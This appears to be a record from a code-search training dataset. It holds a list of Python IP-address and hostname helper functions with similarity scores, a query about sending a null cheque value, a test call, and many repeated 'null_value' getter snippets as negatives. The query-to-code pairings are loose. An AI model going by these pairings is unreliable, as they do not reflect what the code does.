= strip_prefix(host, \"PC-\")\n host = strip_prefix(host, \"DESKTOP-\")\n host = strip_prefix(host, \"LAPTOP-\")\n host = strip_prefix(host, \"iPod-de-\")\n host = strip_prefix(host, \"iPadde\")\n\n return host", "def test_clean_ip(self):\n\n raw_ip = 
'client=mail-ed1-f51.google.com[209.85.208.51]'\n result = clean_ip(raw_ip)\n self.assertEqual(result, '209.85.208.51')", "def __str__(self):\n \n return self._addr[0] + \":\" + str(self._addr[1])", "def get_random_ip():\n return \".\".join(str(random.randrange(1, 255)) for i in range(4))", "def __str__(self):\n return \"{}\".format(visiteur.ip)", "def format_url_address(address):\n try:\n addr = netaddr.IPAddress(address)\n if addr.version == constants.IPV6_FAMILY:\n return \"[%s]\" % address\n else:\n return str(address)\n except netaddr.AddrFormatError:\n return address", "def escape_dot(s):\n\treturn s. \\\n\t\treplace(\"{\", \"\\\\{\").\\\n\t\treplace(\"}\", \"\\\\}\").\\\n\t\treplace(\"\\n\", \"\").\\\n\t\treplace(\"\\r\", \"\")", "def get_host_string(addr: AddressTupleVXType) -> str:\n if len(addr) >= 3:\n addr = cast(AddressTupleV6Type, addr)\n if addr[3]:\n return \"{}%{}\".format(addr[0], addr[3])\n return addr[0]", "def get_ip_type1(self) -> str:\n hex_ip = hexlify(self.message)[152:160]\n ip_addr = int(hex_ip[6:8] + hex_ip[4:6] + hex_ip[2:4] + hex_ip[0:2], 16)\n return inet_ntoa(pack(\"<L\", ip_addr))", "def get_single_net_client_addr (ip_addr, octetListDict = {'3' : 1}, ip_type = 'ipv4'):\n if ip_type == 'ipv4':\n ip_lst = ip_addr.split('.')\n\n for octet,increment in octetListDict.iteritems():\n int_octet = int(octet)\n if ((int_octet < 0) or (int_octet > 3)):\n raise ValueError('the provided octet is not legal in {0} format'.format(ip_type) )\n else:\n if (int(ip_lst[int_octet]) + increment) < 255:\n ip_lst[int_octet] = str(int(ip_lst[int_octet]) + increment)\n else:\n raise ValueError('the requested increment exceeds 255 client address limit')\n\n return '.'.join(ip_lst)\n\n else: # this is a ipv6 address, handle accordingly\n ip_lst = ip_addr.split(':')\n\n for octet,increment in octetListDict.iteritems():\n int_octet = int(octet)\n if ((int_octet < 0) or (int_octet > 7)):\n raise ValueError('the provided octet is not legal in {0} format'.format(ip_type) )\n else:\n if (int(ip_lst[int_octet]) + increment) < 65535:\n ip_lst[int_octet] = format( int(ip_lst[int_octet], 16) + increment, 'X')\n else:\n raise ValueError('the requested increment exceeds 65535 client address limit')\n\n return ':'.join(ip_lst)", "def AioNodeToIpAddressString(node):\n ip = aio_node_to_ip_address.AioNodeToIpAddress(node)\n return '%d.%d.%d.%d' % (ip.a, ip.b, ip.c, ip.d)", "def change_host(self, str_cef, address):\r\n tmp = str_cef\r\n if str_cef.find(\"CEF:\",0,len(str_cef)) != -1:\r\n tmp = str_cef[:21] + str(address[0]) + str_cef[25:]\r\n\r\n elif str_cef.find(\"|\",0,len(str_cef)) != -1:\r\n st = str_cef.find(\"|\",0,len(str_cef))\r\n st = str_cef.find(\"|\",st+1,len(str_cef))\r\n tmp = str_cef[:st+1]+str(address[0])+\"|\"+str_cef[st+1:]\r\n return tmp", "def _grab_host(self):\r\n host = \"\"\r\n while True:\r\n while self._char != -1 and not self._char in \".\\x00\\t\\r\\n\":\r\n host += self._char\r\n self._get_char()\r\n if self._char == \".\":\r\n host += \".\"\r\n self._get_char()\r\n else:\r\n break\r\n return host", "def replace_dot(data):\n data = re.sub(\"[.]\", \" . 
\", data)\n return data", "def hex2ip(self, irc, msg, args, iphex):\n \n ip = self._numToDottedQuad(iphex)\n if ip and len(iphex) == 8:\n record = self._record_by_addr(ip)\n if record:\n reply = u'%s (%s)' % (ip, self._geoip_city_check(record))\n else:\n reply = u'geoIP Fehler!'\n else:\n reply = u'Invalide Eingabe'\n irc.reply(reply.encode('utf-8'))", "def showIP(ans, ip):\n\tparam = ans.split(\"=\")[1]\n\tprint \"%s\\t\\t http://%s:%s\" % (param, ip, port)", "def get_internal_ip(self, external_ip):\n if external_ip[-1:] == '2':\n return external_ip[:-1] + '1'\n else:\n # not a proper ip of a neighbor\n return ''", "def format_ethernet(value, mask):\n value_ether = \":\".join(re.findall('..', \"{:012x}\".format(value)))\n if mask is None:\n return value_ether\n value_mask = \":\".join(re.findall('..', \"{:012x}\".format(mask)))\n return \"{}/{}\".format(value_ether, value_mask)", "def to_vxlan(ip_addr):\n return \"192.168.\" + \".\".join(ip_addr.split(\".\")[2:])", "def reverse_lookup_zone(ipaddress):\n return reverse_dotted_decimals(ipaddress) + '.in-addr.arpa'", "def get_local_host_ip(self) -> str:", "def get_primary_ip(options, index):\n\n second_octet = 160 + index\n return \"192.%s.1.1\" % second_octet", "def _rloc_ip_net_addr(self):\n self.net_addr = ':'.join(self.rloc.split(':')[:-1]) + ':'\n return self.net_addr", "def genIp():\n ip = \".\".join(str(random.randint(0, 255)) for _ in range(4))\n return ip", "def generateIPAddress(base, subnet, host, mask):\n\n addr = str(base)+'.'+str(subnet)+'.' + str(host)\n if mask != None:\n addr = addr + '/' + str(mask)\n return addr", "def get_ip_type2(self) -> str:\n hex_ip = hexlify(self.message)[154:162]\n ip_addr = int(hex_ip[0:2] + hex_ip[2:4] + hex_ip[4:6] + hex_ip[6:8], 16)\n return inet_ntoa(pack(\">L\", ip_addr))", "def ipAddress():\n \n sk = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n sk.connect((\"8.8.8.8\", 80))\n ip = (sk.getsockname()[0])\n sk.close()\n return str(ip)", "def ip_to_net_ent_title_ios(ip_addr):\n try:\n ip_words = ip_addr.words\n except AttributeError:\n import netaddr # try to cast to IP Address\n ip_addr = netaddr.IPAddress(ip_addr)\n ip_words = ip_addr.words\n\n log.debug(\"Converting IP to OSI ENT format\")\n area_id = \"49\"\n ip_octets = \"\".join(\"%03d\" % int(\n octet) for octet in ip_words) # single string, padded if needed\n return \".\".join([area_id, ip_octets[0:4], ip_octets[4:8], ip_octets[8:12],\n \"00\"])", "def longToIp(longIp):\n stringIp = socket.inet_ntoa(struct.pack(\"!L\", longIp))\n return stringIp", "def format_hostname(hostname: str) -> str:\n if has_ipv6 and re.match(r\"\\d+.\\d+.\\d+.\\d+\", hostname) is not None:\n hostname = f\"::ffff:{hostname}\"\n return hostname", "def display_first_last_broadcast_dotted(network_address, first_host_address, last_host_address, broadcast_address):\n\n\n\t#Print the results for selected IP/mask\n\t# print(\"\\nWhat are the network, first host, last host and broadcast addresses in dotted decimal?\")\n\t# input('Press enter to continue...')\n\n\tprint (\"\\nAddresses in dotted decimal notation:\")\n\tprint (\"Network address is: %s\" % network_address)\n\tprint (\"First host is: %s\" % first_host_address)\n\tprint (\"Last host is: %s\" % last_host_address)\n\tprint (\"Broadcast address is: %s\" % broadcast_address)\n\tprint(\"\\n\")\n\n\t#return(net_ip_address, bst_ip_address, network_address)", "def test_replace_host_subnet(self):\n pass", "def ip_address(addr):\n parts = addr.split('.')\n if len(parts) != 4:\n raise TypeError('{} does not match 
an IP address pattern'.format(addr))\n for part in parts:\n try:\n num = int(part)\n if num < 0 or num > 255:\n raise TypeError('{} does not match an IP address pattern'.format(addr))\n except ValueError:\n raise TypeError('{} does not match an IP address pattern'.format(addr))\n return addr", "def reverse_name(net: str) -> str:\n\n network: IPNetwork = ipaddress.ip_network(net)\n ip: IPAddress = network.network_address\n\n if network.version == 4:\n octet_size = 8\n octet_number = 4\n elif network.version == 6:\n octet_size = 4\n octet_number = 32\n else:\n logging.error('Bad address family: %s', network.version)\n abort('I cannot handle this address type')\n\n if network.prefixlen % octet_size != 0:\n logging.error('Mask must be multiple of %d for IPv%d', octet_size, network.version)\n abort(\"I don't know what to do\")\n\n num = network.prefixlen // octet_size\n octets = ip.reverse_pointer.split('.')\n st = '.'.join(octets[(octet_number - num):])\n\n return st", "def _format_senders_correspondent_53D(self, val):\n account = val.get('ACCOUNT')\n name = val.get('NAME')\n address = val.get('ADDRESS')\n if name and address:\n name = FSwiftWriterUtils.split_text_and_prefix(name, 35)\n address = FSwiftWriterUtils.split_text_and_prefix(address, 35)\n val = FSwiftWriterUtils.allocate_space_for_name_address_without_constraint(name, address)\n if account:\n val = \"/\" + str(account) + \"\\n\" + str(val)\n return val", "def getServerIP():\n # Create a UDP socket at client side\n UDPClientSocket = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)\n UDPClientSocket.settimeout(0.15)\n\n \n for i in ['127.0.0.1']+list(range(0,256)):#iterating through all network IPs....127.0.0.1 is localhost\n try:\n IP=\"192.168.2.\"+str(i) if i!='127.0.0.1' else i #\n print(IP,end=\" \") \n UDPClientSocket.sendto(bytesToSend, (IP, 20001))#send message\n msg,IP = UDPClientSocket.recvfrom(bufferSize)#get response\n if (msg==str.encode(ACK_MESSAGE)):\n print()#printed IP wont clear without this command\n cls()#if IP found it clears all the console \n return IP[0]\n except Exception as e:\n print(e)\n \n return 0", "def handle_hexip(bot, ievent):\n if not ievent.args:\n return ievent.missing('<ip | hex ip>')\n is_a = None\n if _re_hexip.match(ievent.args[0]):\n is_a = 'hexip'\n else:\n try:\n socket.inet_pton(socket.AF_INET, ievent.args[0])\n is_a = 'defip'\n except socket.error:\n pass\n if not is_a:\n ievent.missing('<ip | hex ip>')\n return\n if is_a == 'hexip':\n ip = []\n for i in range(4):\n ip.append(str(int(ievent.args[0][i*2:i*2+2], 16)))\n ip = '.'.join(ip)\n nevent = copy.copy(ievent)\n nevent.args = [ip]\n handle_dns(bot, nevent)\n else:\n test = ievent.args[0].split('.')\n ip = 16777216 * int(test[0]) + 65536 * int(test[1]) + 256 * \\\nint(test[2]) + int(test[3])\n ievent.reply('ip %s = %08x' % (ievent.args[0], ip))", "def ip2host(self, irc, msg, args, ip):\n \n try:\n hostname = socket.gethostbyaddr(ip)\n hostname = hostname[0]\n if hostname:\n record = self._record_by_addr(ip)\n if record:\n reply = u'%s (%s)' % (hostname, self._geoip_city_check(record))\n else:\n reply = u'geoIP Fehler!'\n except:\n reply = u'gethostbyaddr() Error'\n \n irc.reply(reply.encode('utf-8'))", "def address_string(self):\n\n if self.server.log_ip_activated:\n host = self.client_address[0]\n else:\n host = '127.0.0.1'\n if self.server.resolve_clients:\n return socket.getfqdn(host)\n else:\n return host", "def set_label(self):\n try:\n self.get_mask()\n except ex.excError:\n pass\n try:\n self.getaddr()\n addr = 
self.addr\n except ex.excError:\n addr = self.ipname\n self.label = \"%s/%s %s/%s\" % (addr, to_cidr(self.mask), self.ipdev, self.ipdevExt)\n if self.ipname != addr:\n self.label += \" \" + self.ipname", "def format_ipv4(value, mask=None):\n value_ipv4 = \".\".join([str(int(x, 16)) for x in re.findall('..', \"{:08x}\".format(value))])\n if mask is None:\n return value_ipv4\n value_mask = \".\".join([str(int(x, 16)) for x in re.findall('..', \"{:08x}\".format(mask))])\n return \"{}/{}\".format(value_ipv4, value_mask)", "def process_address(text):\n return sanitize(text[9:])", "def __str__(self):\n return self.the_ip", "def int2ip(n: int) -> str:\n return socket.inet_ntoa(struct.pack(\"!I\", n))", "def format_ipv6(value, mask):\n value_ipv6 = \":\".join(re.findall('..', \"{:032x}\".format(value)))\n if mask is None:\n return value_ipv6\n value_mask = \":\".join(re.findall('..', \"{:032x}\".format(mask)))\n return \"{}/{}\".format(value_ipv6, value_mask)", "def dot():\n print_message(\".\")", "def dotted_netmask(mask):\n mask = int(mask)\n bits = 0xffffffff ^ (1 << 32 - mask) - 1\n return socket.inet_ntoa(struct.pack('>I', bits))", "def _repr_remote(self):\n return \"%s:%d\" % (self.remote_address)", "def randomIP():\n\tip = \".\".join(map(str, (random.randint(0,255)for _ in range(4))))\n\treturn ip", "def AioMessageTypeToIpAddressString(message_type):\n ip = network_config.AioMessageTypeToIpAddress(message_type)\n return '%d.%d.%d.%d' % (ip.a, ip.b, ip.c, ip.d)", "def get_ip(self):", "def w(s):\r\n gv[\"epsf\"].write(s + \"\\n\")", "def address(self):\n return f'Address = {self._peer.address}/{self._peer.subnet.prefixlen}'", "def network(ip):\n ip, prefix = netParse(ip)\n return \"{}/{}\".format(\n ipStr(ip & (0xffffffff << (32 - prefix))),\n prefix\n )", "def handle_dots(string):\n if '.' in string:\n if string[-1] == '.':\n string = string[:-1]\n else:\n string = string.replace('.', '. ')\n\n return string", "def host2ip(self, irc, msg, args, hostname):\n \n try:\n ip = socket.gethostbyname(hostname)\n if ip:\n record = self._record_by_addr(ip)\n if record:\n reply = u'%s (%s)' % (ip, self._geoip_city_check(record))\n else:\n reply = u'geoIP Fehler!'\n \n except:\n reply = u'gethostbyname() Error'\n \n irc.reply(reply.encode('utf-8'))", "def ipwrap(address: Any) -> str:\n try:\n if not isinstance(address, int):\n ipaddress.IPv6Address(address)\n return f\"[{address}]\"\n except ValueError:\n pass\n\n return str(address)", "def get_ip_string():\n return netifaces.ifaddresses('br0')[netifaces.AF_INET][0]['addr']", "def ip_f(x: Text) -> Tuple[Optional[Text], Optional[Text]]:\n try:\n addrv6 = ipaddress.IPv6Address(x)\n return \"ipv6\", str(addrv6.exploded)\n except ipaddress.AddressValueError:\n try:\n ipaddress.IPv4Address(x)\n return \"ipv4\", x\n except ipaddress.AddressValueError:\n pass\n\n return None, None", "def hex_encode_ip(ip_addr):\n if not ip_addr:\n return None\n\n return base64.b16encode(ip_addr.packed).rjust(32, '0')", "def dots(result):\n sys.stdout.write(CHARACTER[result])\n sys.stdout.flush()", "def __repr__(self):\n return f\"{self.vip}/{self.mask}\"", "def _send(self, data: str):\n try:\n self._sock.sendto(data.encode(\"ascii\"), self._addr)\n except (socket.error, RuntimeError):\n # No time for love, Dr. 
Jones!\n pass", "def ip_to_str(address):\n return socket.inet_ntop(socket.AF_INET, address)", "def aprs_msg(src,dst,via,addr,msgtext):\n\n to = addr.ljust(9)[:9]\n msg = src + '>' + dst\n if via:\n msg += ',' + via\n msg += '::' + to + ':' + msgtext\n return msg", "def get_address(self):\r\n return \"iDigi\"", "def ip_info():\n return str(getIP())", "def print_local_ip():\n spacer = '-' * 50\n local_ip = gethostbyname(gethostname())\n print('\\n{}\\nLocal IP address is: {}\\n{}'.format(spacer, local_ip, spacer))", "def host_ip_address(self, host_index, vlan_index):\n if isinstance(vlan_index, tuple):\n vlan_index = vlan_index[0]\n return '10.%u.0.%u/%u' % (vlan_index+1, host_index+1, self.NETPREFIX)", "def GetIPAddr():\n cmd = \"ifconfig | awk '/192/ {print $2}'\"\n res = Run(cmd).replace(\"\\n\", \"\") # remove end of line char\n return res.replace(\"addr:\", \"\") # remove \"addr:\" prefix", "def dot():\n\n sys.stdout.write('.')\n sys.stdout.flush()", "def address(self):\n return \"%s:%s\" % (self.ip, self.port)", "def sanitize_dot(func):\n return str(func).replace(\"::\", \"\\\\\")", "def send(self,message):\n self.transport.write(message, (\"228.0.0.5\", udpbport))", "def iplst_to_ipaddr(iplst):\n return \".\".join([str(o) for o in iplst])", "def send_error(self, conn, msg):\n #print(\"THIS IS CONNNNNNNNNNNNNNNNNNNN\", conn.getsockname(), conn.getpeername()) \n usIP = conn.getpeername()[:-1] + \"1\" \n #print(usIP) \n no_route = {\"src\": usIP, \"dst\": msg[\"src\"], \"type\": \"no route\", \"msg\": {}}\n conn.send(json.dumps(no_route).encode(\"ascii\"))\n return", "def format_tag(tag):\n # If the tag presented is an IP address then no modifications are required\n try:\n ip_network(tag)\n except ValueError:\n # If an IP was not provided then assume fqdn\n tag = tag.split(\".\")[0]\n tag = truncate(tag, max_len=100)\n return tag", "def ip_for_event (event):\n eth = dpid_to_str(event.dpid,True).split(\"|\")[0].replace(\"-\",\":\")\n return EthAddr(eth)", "def generateRandomIPv4():\n return \".\".join(map(str, (random.randint(0, 255) for _ in range(4))))", "def prepare_value(self, value):\n if value is None:\n return value\n value = value.replace(\" \", \"\").replace(\".\", \"\")\n if value:\n return \"%s.%s.%s.%s\" % (value[0:3], value[3:7], value[7:11], value[11:])\n return value", "def change_ip(sender_socket, ip, port):\n sender_socket.sendto(bytes(\"change ip\", \"UTF-8\"), (ip, port))\n new_ip_str = input(\"New Host IP Address: \")\n sender_socket.sendto(bytes(new_ip_str, \"UTF-8\"), (ip, port))\n sleep(0.5)\n status = sender_socket.recv(BUFFER_SIZE)\n status_message = status.decode(\"UTF-8\")\n if \"IP Address Successfully Changed\" in status_message:\n print(status_message)\n return True\n else:\n print(status_message)\n return False", "def replace_three_dots(self):\n self.value = re.sub(self.patterns['replace_three_dots'], ' …', self.value)\n return self", "def getGwIp(target):\n tmp = target.split('.')\n try:\n gw = (tmp[0] + \".\" + tmp[1] + \".\" + tmp[2] + \".1\")\n except IndexError:\n print(bcolors.FAIL + \" Invalid IP provided: \" + target + bcolors.ENDC)\n return False\n return gw", "def routepack(value):\n return str(value).replace(\"/\",\"!\")" ]
[ "0.72598726", "0.66860425", "0.6652515", "0.6595804", "0.6511511", "0.6166377", "0.6115366", "0.6104999", "0.6004845", "0.5908386", "0.58287203", "0.5827624", "0.5757114", "0.56950575", "0.56721663", "0.55715144", "0.55706215", "0.556447", "0.5561804", "0.55530185", "0.54516596", "0.54496413", "0.5426353", "0.53926975", "0.5392128", "0.53893584", "0.53569096", "0.535198", "0.53455335", "0.53420097", "0.5339464", "0.5338504", "0.53355426", "0.5322107", "0.5309466", "0.5305716", "0.52971506", "0.52936226", "0.52881557", "0.528492", "0.5284452", "0.5281971", "0.52443576", "0.5236537", "0.52309597", "0.5230426", "0.52237624", "0.5222075", "0.521139", "0.52079684", "0.5207371", "0.520505", "0.52027017", "0.51968265", "0.5188847", "0.51820046", "0.5181025", "0.5174663", "0.5168358", "0.51432514", "0.51376826", "0.513469", "0.5125834", "0.5105581", "0.5098868", "0.50957096", "0.50868875", "0.50851285", "0.50847584", "0.50823843", "0.50822467", "0.5081802", "0.50779736", "0.5065286", "0.5064759", "0.5063762", "0.5061711", "0.5053406", "0.5047245", "0.5037974", "0.5019106", "0.5018323", "0.5011488", "0.50006264", "0.49956003", "0.49892136", "0.4980438", "0.49798745", "0.49680758", "0.49653453", "0.49633604", "0.49459702", "0.49386317", "0.49335146", "0.49333227", "0.49240398", "0.49238333", "0.49185684", "0.49126276", "0.49054578", "0.4901652" ]
0.0
-1
Send null value in Description
def test_51(self): assert 'False' == Api.requestBlock('test-51', CustomFields=True)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _description(self):\n return None", "def shortDescription(self):\n return None", "def get_description_value(obj):\n desc = None if obj is None else obj.GetObjectDescription()\n if desc == \"<nil>\":\n desc = None\n return desc", "def get_is_null_label(self):\n return pgettext_lazy('listfilter AbstractDateTime', 'Has no value')", "def description(self):\r\n if \"description\" in self.data:\r\n return self.data[\"description\"]\r\n return None", "def Description(self) -> str:", "def Description(self) -> str:", "def Description(self, default=None):\n return self.data.get('description', default)", "def Description(self, default=None):\n return self.data.get('description', default)", "def description(self):", "def description(self):\n\t\tif self._record is not None:\n\t\t return self._record.description\n\t\telse:\n\t\t return \"\"", "def describe(self):\n return ''", "def description(self):\n pass", "def description(self):\n pass", "def description(self) -> Optional[str]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[str]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[str]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[str]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[str]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[str]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[str]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[str]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[str]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[str]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[str]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[str]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[str]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[str]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[str]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[str]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[str]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[str]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[str]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[str]:\n return pulumi.get(self, \"description\")", "def description(self):\n if \"description\" in self._prop_dict:\n return self._prop_dict[\"description\"]\n else:\n return None", "def get_description(self):", "def description(self, value):\n if len(value):\n self._description = value\n self._description = self._wrap_line(value, self._width)\n\n # Add a blank line\n self._description.append('')", "def description():", "def noneType(value):\r\n return ''", "def description(self, newDescription=None):\n pass", "def __str__(self):\r\n # If the original value is None, represent this as 'NULL'\r\n if self.original is None:\r\n return 'NULL'\r\n return str(self.original)", "def test_empty_description(self):\n self.check_validation_error('description\\n string does not match regex \".+\"', name=\"Name\", description=\"\")", "def set_description(self):\n if 'description' not in self.data:\n if self.verbose:\n click.echo('Adding 
empty descriptions to root')\n self.data['description'] = ''", "def get_description(self):\n pass", "def __str__(self):\n return \"Description(values={},data_model={})\".format(\n self._values, self.data_model\n )", "def name(self):\n return 'Null'", "def check_no_description(self):\n context = TestContext(session_context=ducktape_mock.session_context(),\n cls=DummyTestNoDescription, function=DummyTestNoDescription.test_this)\n assert context.description == \"\"", "def _set_None(self):\n\n self.description = None\n self.func = None", "def test_null_field(self):\r\n problem = self.get_item_from_modulestore(self.problem_usage_key, True)\r\n self.assertIsNotNone(problem.markdown)\r\n self.client.ajax_post(\r\n self.problem_update_url,\r\n data={'nullout': ['markdown']}\r\n )\r\n problem = self.get_item_from_modulestore(self.problem_usage_key, True)\r\n self.assertIsNone(problem.markdown)", "def description(self) -> typing.Optional[str]:\n return self._values.get('description')", "def description(self, description) :\n\t\ttry :\n\t\t\tself._description = description\n\t\texcept Exception as e:\n\t\t\traise e", "def description(self) -> Optional[str]:\n if hasattr(self, \"_description\"):\n return self._description\n _args: list[Arg] = []\n _ctx = self._select(\"description\", _args)\n return _ctx.execute_sync(Optional[str])", "def description(self) -> Optional[str]:\n if hasattr(self, \"_description\"):\n return self._description\n _args: list[Arg] = []\n _ctx = self._select(\"description\", _args)\n return _ctx.execute_sync(Optional[str])", "def description(self) -> Optional[str]:\n if hasattr(self, \"_description\"):\n return self._description\n _args: list[Arg] = []\n _ctx = self._select(\"description\", _args)\n return _ctx.execute_sync(Optional[str])", "def get_is_not_null_label(self):\n return pgettext_lazy('listfilter AbstractDateTime', 'Has value')", "def silent_none(value):\n if value is None:\n return ''\n return value", "def description(self) -> str:\n pass", "def get_description():\n raise NotImplementedError", "def __str__(self):\n return self.description", "def __str__(self):\n return self.description", "def description(self, value):\n self.definition.description = value", "def get_description(self) -> Optional[str]:\n return self._description", "def description(self, value):\n self._update_values('description', value)", "def get_description(self) -> str:\n pass", "def dataDescription(self, role):\n return None", "def _get_blank_value_19(field):\n if field.null:\n return None\n else:\n return ''", "def get_description(self):\n raise NotImplementedError", "def testClearWithNone(self):\n\n # Bypass setter\n self.node._desc = ['first description']\n\n self.node.desc = None\n\n self.assertEqual(\n [],\n self.node.desc\n )", "def _get_blank_value_18(field):\n if field.null:\n return None\n else:\n return field.value_to_string(None)", "def __str__(self):\n #{{{ Nicely print values\n text = 'Null values for databases: %s' % self.dbcentral.list()\n\n for value in self.null_vals.keys():\n text += \"\\t%s: %s\" % (value,self.null_vals[value])\n\n return text", "def description(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"description\")", "def description(self) -> 
Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"description\")", "def description(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"description\")" ]
[ "0.71918756", "0.7042839", "0.66677594", "0.6598743", "0.65510976", "0.65307844", "0.65307844", "0.6500336", "0.6500336", "0.6499697", "0.64579976", "0.6434815", "0.64035326", "0.64035326", "0.63527375", "0.63527375", "0.63527375", "0.63527375", "0.63527375", "0.63527375", "0.63527375", "0.63527375", "0.63527375", "0.63527375", "0.63527375", "0.63527375", "0.63527375", "0.63527375", "0.63527375", "0.63527375", "0.63527375", "0.63527375", "0.63527375", "0.63527375", "0.6350401", "0.6328347", "0.6308527", "0.62993616", "0.62753403", "0.626873", "0.62592566", "0.62395304", "0.6223116", "0.62086266", "0.6198167", "0.61933094", "0.6169609", "0.615959", "0.6138322", "0.6134888", "0.612953", "0.6129257", "0.6129257", "0.6129257", "0.61264503", "0.6114641", "0.6101282", "0.6100275", "0.6095477", "0.6095477", "0.60834324", "0.60573494", "0.60169435", "0.601493", "0.60041016", "0.6000227", "0.59963757", "0.59874076", "0.5975196", "0.5970984", "0.59629285", "0.59629285", "0.59629285", "0.59629285", "0.59629285", "0.59629285", "0.59629285", "0.59629285", "0.59629285", "0.59629285", "0.59629285", "0.59629285", "0.59629285", "0.59629285", "0.59629285", "0.59629285", "0.59629285", "0.59629285", "0.59629285", "0.59629285", "0.59629285", "0.59629285", "0.59629285", "0.59629285", "0.59629285", "0.59629285", "0.59629285", "0.59629285", "0.59629285", "0.59629285", "0.59629285" ]
0.0
-1
Send null value in Cheque field
def test_52(self): assert 'False' == Api.requestBlock('test-52')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _get_blank_value_19(field):\n if field.null:\n return None\n else:\n return ''", "def _get_blank_value_18(field):\n if field.null:\n return None\n else:\n return field.value_to_string(None)", "def none_to_empty(data):\n return data if data is not None else ''", "def silent_none(value):\n if value is None:\n return ''\n return value", "def noneType(value):\r\n return ''", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", "def null_value(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"null_value\")", 